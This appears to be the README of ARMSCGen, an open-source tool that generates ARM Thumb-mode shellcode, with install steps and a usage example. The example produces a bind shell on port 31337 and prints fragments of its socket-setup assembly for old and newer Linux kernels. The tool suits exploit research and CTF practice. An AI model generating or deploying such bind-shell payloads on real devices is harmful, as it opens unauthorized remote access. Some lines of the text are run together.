Repository files navigation

Ideas came fromshell-storm andpwntools/pwnies.

Thanks to share all of brilliant sources on the net.

I'm interested in mobile platform and archtecture like Android on ARM, Router on MIPS and so on.

This project named ARMSCGen focus on shellcode on ARM Architecture especially ARMv7 Thumb Mode.

• updated: v0.0.20
  • added sctest for emulating shellcodes using unicorn-engine
  • removed test code related to unicorn-engine in scgen.py

ARMSCGen highly depends on{capstone|keystone|unicorn}-engine.

Capstone is needed to disassemble codes.Install Capstone with:

$sudo pip install capstone

Keystone is needed to assemeble shellcodes.Install Keystone with:

$sudo pip install keystone-engine

or refers tohere

Unicorn Engine is needed to emulate shellcodes.For installing Unicorn Engine, refers tohere

$sudo python setup.py install

readsexamples directory (some examples has been outdated)

and

usesscgen.py in CLI mode

please refer toshellcodes_lists.md orscgen -l -a all

Some of thumb mode shellcodes have new option namedversion.

If you'd like to test shellcodes on old kernel like 2.x then

try to use this option.for example

# linux kernel 2.4 - socketcall$ scgen -a thumb bindshell 31337 4 2 0 -f a/* socketcall( socket, { 2, 1, 6 } ) */movs r1, #2movs r2, #1movs r3, #6push {r1-r3}movs r0, #1mov  r1, spmovs r7, #102svc 1# linux kernel 3.x or later$ scgen -a thumb bindshell 31337 4 3 0 -f a/* socket(...) */movs r0, #2movs r1, #1subs r2, r2, r2subs r7, r7, r7adds r7, r7, #255adds r7, r7, #26svc 1

(need to upgrade) URL:http://armscgen.readthedocs.org/ or/docs/ in source

writes shellcodes precisely and writes docs in detail

(To be continued)